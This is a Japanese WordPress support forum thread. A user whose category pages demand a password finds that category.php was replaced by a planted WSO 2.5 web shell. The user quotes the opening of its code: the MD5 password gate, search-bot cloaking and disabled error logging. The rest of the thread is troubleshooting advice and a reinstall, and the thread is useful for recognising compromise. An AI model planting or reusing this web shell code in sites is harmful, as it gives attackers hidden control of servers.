サポート » 使い方全般 » カテゴリーを見るとパスワードを求められます。

  • 解決済 yukke1006

    (@yukke1006)


    いつもお世話になってます。

    自身で作成したデザインなのですが、
    yukke1006.com

    カテゴリーを選択すると、パスワードを求められます。
    これといって、パスワードがかかるような設定をした覚えがないのですが、
    プラグインとかの影響でしょうか。

    http://yukke1006.com/category/%E6%98%A0%E7%94%BB/

    Allow Categoriesのようなプラグインを使っているわけではないのですが、

    分かる方いらっしゃいましたら、
    どうぞ宜しくお願い致します。

6件の返信を表示中 - 1 - 6件目 (全6件中)
  • まず、パスワードを要求している部分を見つけることを考えましょう。

    ● プラグインを使っている場合は、全てオフにする
    ● テーマをデフォルトにする

    この状態でパスワード要求が生じないようであれば、
    ● テーマを変える
    => ここでパスワード要求が生じれば、テーマに起因する

    => ここでパスワード要求が生じない場合は、
    => ● プラグインを1つずつ有効にする
    => =>パスワード要求が生じれば、そのプラグインに起因する

    返信遅れまして、すみません。

    ご丁寧に有難うございます。
    どうやら、テーマが原因でした。
    他のテーマでは、通常通り見れたので。

    最近、デザインをいじった記憶がないので、あれなんですが、
    自作デザインが原因と分かったので、ちょっと見てみます。

    特に、何もいじってないのですが、
    ブログ自体見れなくなってしまいました。。
    下記エラーが出ます。

    Internal Server Error

    The server encountered an internal error or misconfiguration and was unable to complete your request.
    Please contact the server administrator, support@sakura.ad.jp and inform them of the time the error occurred, and anything you might have done that may have caused the error.

    More information about this error may be available in the server error log.

    これはサーバー側の問題なんでしょうか。
    全くのド素人なので、どなたか分かる方いらっしゃいましたら、ご教示下さい。
    こちらのトピックで質問していいのかは分かりませんが、、、

    エラーは改善されたようですが、パスワードはかかっていますね。

    >自身で作成したデザインなのですが
    パスワードをかけるような仕組みをご自身で組み込んでいないのであれば、おそらくどこからかテーマソースなどは持ってきたように思うので、プラグインが原因でなければそれが起因しているのではないでしょうか。

    URLもカテゴリーベースの正常のパーマリンクですが、パスワード画面はサーバーからのものではないですし、インストールされているプラグインやテーマの参照元など、情報が少なすぎてこれ以上は誰も判断できないと思いますよ。

    なにこれ怖い・・・

    テンプレートの構成はどうなっていますか?
    category.phpの中身がこれだからこれが表示されてる以外の理由が思いつきません。

    EisukeAkimoto様
    paruchan様
    回答有難うございます。

    category.phpは真っ先にみたつもりになってました。どうやら違うファイルを見ていたようでして、サーバーにアップされていたcategory.phpは以下のものになっていました。
    ファイルがとても重くなっていてびっくりしました。(かなり長いので省略してのせます)

    <?php
    $auth_pass = "025e52c1f0ff9b303ed42d1c9f2ad7ff";
    $color = "#df5";
    $default_action = 'FilesMan';
    $default_use_ajax = true;
    $default_charset = 'Windows-1251';
    
    if(!empty($_SERVER['HTTP_USER_AGENT'])) {
        $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
        if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
            header('HTTP/1.0 404 Not Found');
            exit;
        }
    }
    
    @ini_set('error_log',NULL);
    @ini_set('log_errors',0);
    @ini_set('max_execution_time',0);
    @set_time_limit(0);
    @set_magic_quotes_runtime(0);
    @define('WSO_VERSION', '2.5');
    
    if(get_magic_quotes_gpc()) {
    	function WSOstripslashes($array) {
    		return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    	}
    	$_POST = WSOstripslashes($_POST);
        $_COOKIE = WSOstripslashes($_COOKIE);
    }
    
    function wsoLogin() {
    	die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
    }
    
    function WSOsetcookie($k, $v) {
        $_COOKIE[$k] = $v;
        setcookie($k, $v);
    }
    
    if(!empty($auth_pass)) {
        if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
            WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
    
        if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
            wsoLogin();
    }
    
    if(strtolower(substr(PHP_OS,0,3)) == "win")
    	$os = 'win';
    else
    	$os = 'nix';

    上記長くなって申し訳ございません。66108バイトもありました。
    ちなみに私がもともと書いたものは、WordPressデザインブック3.x対応を参照したもので、
    以下になります。

    <?php get_header(); ?>
    
    <!-- パンくずリスト -->
    <div id="breadcrumb">
    <div itemscope itemtype="http://data-vocabulary.org/Breadcrumb">
    	<a href="<?php echo home_url(); ?>" itemprop="url">
    		<span itemprop="title">トップ</span>
    	</a> &rsaquo;
    </div>
    
    <div><?php single_cat_title(); ?></div>
    </div>
    
    <!-- コンテンツ -->
    <div id="content">
    <p class="title"><?php single_cat_title(); ?></p>
    
    <?php if(have_posts()): while(have_posts()):
    the_post(); ?>
    
    <!-- カスタムパーツテンプレートを読み込む 記事のタイトル概要のみをリストアップするにあたり -->
    	<?php get_template_part('content','excerpt'); ?> 
    <?php endwhile; endif; ?>
    
    <?php get_template_part('pagenation'); ?>
    </div>
    
    <?php get_sidebar(); ?>
    
    <?php get_footer(); ?>

    セキュリティに問題があったのか(よく分からないのですが、ファイルパーミッションの設定がが良くなかったのか)、それとも、私自身が変なことをしたのか不明ですが、
    一応解決致しました。原因が不明で怖いですけど。

    非常に初歩的なこと、原因のcategory.phpをまず見るということをせず、質問してしまい、皆様にご迷惑おかけしたことお詫び致します。

    今回wordpressを再インストールするなどしたため、色々と一からプラグイン、デザインともに見直したいと思います。
    勉強する良いきっかけになったと思います。

    有難うございました。

6件の返信を表示中 - 1 - 6件目 (全6件中)
  • トピック「カテゴリーを見るとパスワードを求められます。」には新たに返信することはできません。